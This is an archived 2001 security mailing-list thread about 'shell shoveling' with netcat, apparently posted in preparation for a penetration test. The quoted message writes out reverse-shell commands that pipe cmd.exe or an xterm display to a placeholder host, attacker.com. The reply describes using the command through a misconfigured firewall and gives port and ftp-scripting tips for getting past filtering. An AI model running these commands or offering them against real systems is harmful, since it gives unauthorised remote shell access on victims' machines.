Thats rather amusing, because i used that exact command last night... Except i changed the ports because of firewall reasons... The reason I had to use it because they were running BlackIce on the webserver and a fw1 box was in front of that as well. A misconfigured Firewall allowed out bound transmissions, and hence that exact command came into play. I suggest trying higher ports and not using port 80, i bet you 5 Dollars if you attempt to setup a listener on port 80 you'll get hit with nimda before your shell gets to you =). It worked quite well except do not try using commands like ftp (it seemed to mess with my listeners a bit. Instead use the ol' ftp -s: switch and create a file with the list of ftp commands. Hope this helps! blue Op Tue, 2 Oct 2001 11:15:28 -0700 "Junginger, Jeremy" <jjungingerat_private> geschreven: > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >Have you guys ever heard of shell shoveling? In playing with NetCat >and reading an infoworld article, I came across a couple of concepts >that I found fascinating. Below are the explanations and command >lines: > >"If the attacker machine is listening with netcat on TCP 80 and 25, >and TCP 80 is allowed inbound and 25 outbound to/from the victim >through the firewall, then this command "shovels" a remote command >shell from victim to attacker.com." > >nc attacker.com 80 | cmd.exe | nc attacker.com 25 > >"If Xterm (TCP 6000) is allowed outbound without restriction, then >the following command would be a nifty Unix equivalent to the above >example:" > >xterm -display attacker.com:0.0 & > >I am planning on using this in an upcomint p.t. and wanted to gain >your insights! Thanks! > > > >-----BEGIN PGP SIGNATURE----- >Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> > >iQA/AwUBO7oEDKlk83sSWEI4EQJT5gCgoed9mdrH4FMkU1vse5zBg1fkiqcAnAsv >0Em+lFGcjjX00Jd6eTEGSSFw >=BUzY >-----END PGP SIGNATURE----- > >---------------------------------------------------------------------------- >This list is provided by the SecurityFocus Security Intelligence Alert (SIA) >Service. For more information on SecurityFocus' SIA service which >automatically alerts you to the latest security vulnerabilities please see: >https://alerts.securityfocus.com/ > > ================================================================= Kies een origineel e-mailadres op www.emails.nl ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Oct 04 2001 - 10:41:53 PDT